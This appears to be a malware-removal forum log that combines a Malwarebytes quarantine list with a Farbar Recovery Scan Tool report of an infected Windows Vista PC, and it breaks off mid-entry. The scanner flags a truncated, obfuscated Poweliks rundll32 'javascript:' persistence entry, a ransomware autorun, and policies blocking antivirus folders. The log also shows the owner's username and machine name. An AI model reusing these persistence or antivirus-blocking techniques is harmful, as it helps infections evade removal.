HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26], PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26], PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [74251faa205b3bfbe62350acc2409a66], PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [990042871b6054e235d494683ac823dd], Registry Values: 1Trojan.Ransom.Gen, HKU\S-1-5-21-3726736968-409882640-1958551794-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IrfuqApivh, regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat", Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85] Registry Data: 0(No malicious items detected) Folders: 0(No malicious items detected) Files: 1Trojan.Ransom.Gen, C:\ProgramData\IrfuqApivh\IrfuqApivh.dat, Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85], Physical Sectors: 0(No malicious items detected) (end) FRST Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 09:47:13Running from G:\Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)Internet Explorer Version 9Boot Mode: Normal The only official download link for FRST:Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ Download link from any site other than Bleeping Computer is unpermitted or outdated.See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Windows\System32\SLsvc.exe(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe(Microsoft Corporation) C:\Windows\System32\wlanext.exe(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE( ) C:\Windows\System32\lxblcoms.exe() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe(Microsoft Corporation) C:\Windows\ehome\ehtray.exe(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTIONHKLM\...\Policies\Explorer: [useDefaultTile] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTIONHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnkShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnkShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnkShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnkShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)BootExecute: autocheck autochk * BootDefrag.exesasnative32 ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearchHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-usSearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No FileDPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cabDPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cabDPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3 FireFox:========FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtensionFF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 Chrome: =======CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]S3 catchme; \??\C:\ComboFix\catchme.sys [X]S3 IpInIp; system32\DRIVERS\ipinip.sys [X]S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt2014-08-24 15:23 - 2014-08-24 15:46 - 00000000 ____D () C:\ComboFix2014-08-23 16:54 - 2014-08-25 09:47 - 00000000 ____D () C:\FRST2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:12 - 2014-08-25 09:17 - 00039662 _____ () C:\Windows\PFRO.log2014-08-22 15:52 - 2014-08-24 15:45 - 00000000 ____D () C:\Qoobox2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-25 08:17 - 00000850 _____ () C:\Windows\setupact.log2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG20142014-08-16 17:05 - 2014-08-16 17:05 - 